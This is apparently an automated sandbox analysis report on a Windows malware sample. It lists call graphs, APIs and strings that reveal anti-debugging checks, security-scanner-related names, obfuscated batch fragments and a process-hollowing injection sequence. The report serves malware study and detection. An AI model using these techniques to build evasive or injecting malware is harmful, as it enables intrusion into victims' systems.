Sleep 29750->29756 29761 2901b81 29750->29761 29751->29750 29754 2901b13 Sleep 29751->29754 29752->29712 29753->29712 29754->29750 29755 2901b2d Sleep 29754->29755 29755->29751 29758 2901b61 Sleep 29756->29758 29756->29761 29759 29016f5 VirtualFree 29757->29759 29758->29750 29760 290170d 29759->29760 29760->29712 29762 2901c00 VirtualFree 29761->29762 29763 2901ba4 29761->29763 29762->29712 29763->29712 29765 2901681 29764->29765 29766 290164d 29764->29766 29765->29732 29766->29765 29767 290164f Sleep 29766->29767 29768 2901664 29767->29768 29768->29765 29769 2901668 Sleep 29768->29769 29769->29766 29774 2901560 29770->29774 29772 29015d4 VirtualAlloc 29773 29015eb 29772->29773 29773->29746 29775 2901500 29774->29775 29775->29772 29776 292d2fc 29786 2906518 29776->29786 29780 292d32a 29791 292bf84 timeSetEvent 29780->29791 29782 292d334 29783 292d342 GetMessageA 29782->29783 29784 292d352 29783->29784 29785 292d336 TranslateMessage DispatchMessageA 29783->29785 29785->29783 29787 2906523 29786->29787 29792 2904168 29787->29792 29790 290427c SysAllocStringLen SysFreeString SysReAllocStringLen 29790->29780 29791->29782 29793 29041ae 29792->29793 29794 2904227 29793->29794 29798 29043b8 29793->29798 29806 2904100 29794->29806 29797 29043e9 29811 290432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 29797->29811 29798->29797 29801 29043fa 29798->29801 29800 29043f3 29800->29801 29802 290443f FreeLibrary 29801->29802 29803 2904463 29801->29803 29802->29801 29804 2904472 ExitProcess 29803->29804 29805 290446c 29803->29805 29805->29804 29807 2904143 29806->29807 29808 2904110 29806->29808 29807->29790 29808->29807 29810 29015cc VirtualAlloc 29808->29810 29812 2905814 29808->29812 29810->29808 29811->29800 29813 2905824 GetModuleFileNameA 29812->29813 29814 2905840 29812->29814 29816 2905a78 GetModuleFileNameA RegOpenKeyExA 29813->29816 29814->29808 29817 2905afb 29816->29817 29818 2905abb RegOpenKeyExA 29816->29818 29834 29058b4 12 API calls 29817->29834 29818->29817 29819 2905ad9 RegOpenKeyExA 29818->29819 29819->29817 29821 2905b84 lstrcpynA GetThreadLocale GetLocaleInfoA 29819->29821 29825 2905bbb 29821->29825 29826 2905c9e 29821->29826 29822 2905b20 RegQueryValueExA 29823 2905b40 RegQueryValueExA 29822->29823 29824 2905b5e RegCloseKey 29822->29824 29823->29824 29824->29814 29825->29826 29828 2905bcb lstrlenA 29825->29828 29826->29814 29829 2905be3 29828->29829 29829->29826 29830 2905c30 29829->29830 29831 2905c08 lstrcpynA LoadLibraryExA 29829->29831 29830->29826 29832 2905c3a lstrcpynA LoadLibraryExA 29830->29832 29831->29830 29832->29826 29833 2905c6c lstrcpynA LoadLibraryExA 29832->29833 29833->29826 29834->29822

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0291F0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • InetIsOffline.URL(00000000,00000000,0292B3D5,?,?,?,000002F7,00000000,00000000), ref: 0291F0E2
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                            • Part of subcall function 0291EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0291F3CC,UacInitialize,0296237C,0292B40C,UacScan,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString), ref: 0291EFCE
                                                                                                                                                                            • Part of subcall function 0291EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0291EFE0
                                                                                                                                                                            • Part of subcall function 0291F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0291F034
                                                                                                                                                                            • Part of subcall function 0291F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0291F046
                                                                                                                                                                            • Part of subcall function 0291F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0291F05D
                                                                                                                                                                            • Part of subcall function 02907E10: GetFileAttributesA.KERNEL32(00000000,?,0291FD00,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,UacScan,0296237C,0292B40C,UacInitialize), ref: 02907E1B
                                                                                                                                                                            • Part of subcall function 0290C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A568C8,?,02920032,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession), ref: 0290C2FB
                                                                                                                                                                            • Part of subcall function 0291DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E01F
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E04F
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0291E064
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0291E090
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0291E099
                                                                                                                                                                            • Part of subcall function 02907E34: GetFileAttributesA.KERNEL32(00000000,?,02922E7D,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,Initialize), ref: 02907E3F
                                                                                                                                                                            • Part of subcall function 02907FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0292301B,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,Initialize,0296237C,0292B40C,ScanString,0296237C,0292B40C), ref: 02907FD5
                                                                                                                                                                            • Part of subcall function 0291DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DFD2), ref: 0291DF3F
                                                                                                                                                                            • Part of subcall function 0291DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0291DF79
                                                                                                                                                                            • Part of subcall function 0291DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0291DFA6
                                                                                                                                                                            • Part of subcall function 0291DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0291DFAF
                                                                                                                                                                            • Part of subcall function 02918798: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                            • Part of subcall function 02918798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                            • Part of subcall function 02918798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                            • Part of subcall function 02918704: LoadLibraryW.KERNEL32(amsi), ref: 0291870D
                                                                                                                                                                            • Part of subcall function 02918704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0291876C
                                                                                                                                                                          • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,0292B764), ref: 02924DEB
                                                                                                                                                                            • Part of subcall function 0291DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0291DEA0
                                                                                                                                                                            • Part of subcall function 0291DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DEF2), ref: 0291DEB6
                                                                                                                                                                            • Part of subcall function 0291DE78: NtDeleteFile.NTDLL(?), ref: 0291DED5
                                                                                                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02924FEB
                                                                                                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02925041
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                                                          • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                                                          • API String ID: 2010126900-181751239
                                                                                                                                                                          • Opcode ID: d16a61f8e4a7d4fa654a16e5b26d0407df8c60cac6309d75efc84d7d141494fe
                                                                                                                                                                          • Instruction ID: ab12b69df1f46a1db2491ee4f211285122845c7e8b10e78713ca25c486eb1098
                                                                                                                                                                          • Opcode Fuzzy Hash: d16a61f8e4a7d4fa654a16e5b26d0407df8c60cac6309d75efc84d7d141494fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 2024E734A1026C8FDB10EBA4DCD0ADE73F6BFD5304F1054E1A509A7299DE70AE9A8F54
                                                                                                                                                                          Function 02918BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 6997 2918ba8-2918bab 6998 2918bb0-2918bb5 6997->6998 6998->6998 6999 2918bb7-2918c9e call 290493c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 6998->6999 7030 2918ca4-2918d7f call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 6999->7030 7031 291a6ef-291a759 call 29044d0 * 2 call 2904c0c call 29044d0 call 29044ac call 29044d0 * 2 6999->7031 7030->7031 7075 2918d85-29190ad call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29030d4 * 2 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2904d8c call 2904d9c call 29185d4 7030->7075 7184 2919120-2919441 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2902ee0 call 2902f08 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c GetThreadContext 7075->7184 7185 29190af-291911b call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 7075->7185 7184->7031 7293 2919447-29196aa call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 291824c 7184->7293 7185->7184 7366 29196b0-2919819 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29184bc 7293->7366 7367 29199b7-2919a22 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 7293->7367 7457 2919843-29198ae call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 7366->7457 7458 291981b-2919841 call 29179ac 7366->7458 7393 2919a28-2919ba8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29179ac 7367->7393 7394 2919a23 call 291881c 7367->7394 7393->7031 7496 2919bae-2919ca7 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2918ab8 7393->7496 7394->7393 7467 29198b4-29199ab call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29179ac 7457->7467 7497 29198af call 291881c 7457->7497 7458->7467 7537 29199b0-29199b5 7467->7537 7549 2919ca9-2919cf6 call 29189b0 call 29189a4 7496->7549 7550 2919cfb-291a453 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2917cf8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2917cf8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c SetThreadContext NtResumeThread call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2902c2c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2918798 * 3 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 7496->7550 7497->7467 7537->7393 7549->7550 7775 291a458-291a6ea call 2918798 * 2 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 * 5 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 2917ecc call 2918798 * 2 7550->7775 7775->7031
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                            • Part of subcall function 029185D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02918660
                                                                                                                                                                          • GetThreadContext.KERNEL32(000008A8,02962420,ScanString,029623A4,0291A774,UacInitialize,029623A4,0291A774,ScanBuffer,029623A4,0291A774,ScanBuffer,029623A4,0291A774,UacInitialize,029623A4), ref: 0291943A
                                                                                                                                                                            • Part of subcall function 0291824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029182BD
                                                                                                                                                                            • Part of subcall function 029184BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02918521
                                                                                                                                                                            • Part of subcall function 029179AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          • SetThreadContext.KERNEL32(000008A8,02962420,ScanBuffer,029623A4,0291A774,ScanString,029623A4,0291A774,Initialize,029623A4,0291A774,000008A4,0033BFF8,029624F8,00000004,029624FC), ref: 0291A14F
                                                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A8,00000000,000008A8,02962420,ScanBuffer,029623A4,0291A774,ScanString,029623A4,0291A774,Initialize,029623A4,0291A774,000008A4,0033BFF8,029624F8), ref: 0291A15C
                                                                                                                                                                            • Part of subcall function 02918798: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                            • Part of subcall function 02918798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                            • Part of subcall function 02918798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                          • API String ID: 4083799063-51457883
                                                                                                                                                                          • Opcode ID: 33e5815baaa37e7fe7a3f7e7df54379b5daac98f0035b8f8008de7d02d12469e
                                                                                                                                                                          • Instruction ID: 5f4ef1d2315ab037d83aec5a3eb6b19b1a3c8b4423e1991ff0a70a33a07c0106
                                                                                                                                                                          • Opcode Fuzzy Hash: 33e5815baaa37e7fe7a3f7e7df54379b5daac98f0035b8f8008de7d02d12469e
                                                                                                                                                                          • Instruction Fuzzy Hash: 74E20530E0111C9FDB11EBA5CCD4EDEB3FAAFC5710F1095A1A609AB295DA30AE46CF51
                                                                                                                                                                          Function 02918BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 7853 2918ba6-2918bab 7855 2918bb0-2918bb5 7853->7855 7855->7855 7856 2918bb7-2918c9e call 290493c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 7855->7856 7887 2918ca4-2918d7f call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 7856->7887 7888 291a6ef-291a759 call 29044d0 * 2 call 2904c0c call 29044d0 call 29044ac call 29044d0 * 2 7856->7888 7887->7888 7932 2918d85-29190ad call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29030d4 * 2 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2904d8c call 2904d9c call 29185d4 7887->7932 8041 2919120-2919441 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2902ee0 call 2902f08 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c GetThreadContext 7932->8041 8042 29190af-291911b call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 7932->8042 8041->7888 8150 2919447-29196aa call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 291824c 8041->8150 8042->8041 8223 29196b0-2919819 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29184bc 8150->8223 8224 29199b7-2919a22 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 8150->8224 8314 2919843-29198ae call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 8223->8314 8315 291981b-2919841 call 29179ac 8223->8315 8250 2919a28-2919ba8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29179ac 8224->8250 8251 2919a23 call 291881c 8224->8251 8250->7888 8353 2919bae-2919ca7 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2918ab8 8250->8353 8251->8250 8324 29198b4-29199b5 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29179ac 8314->8324 8354 29198af call 291881c 8314->8354 8315->8324 8324->8250 8406 2919ca9-2919cf6 call 29189b0 call 29189a4 8353->8406 8407 2919cfb-291a6ea call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2917cf8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2917cf8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c SetThreadContext NtResumeThread call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 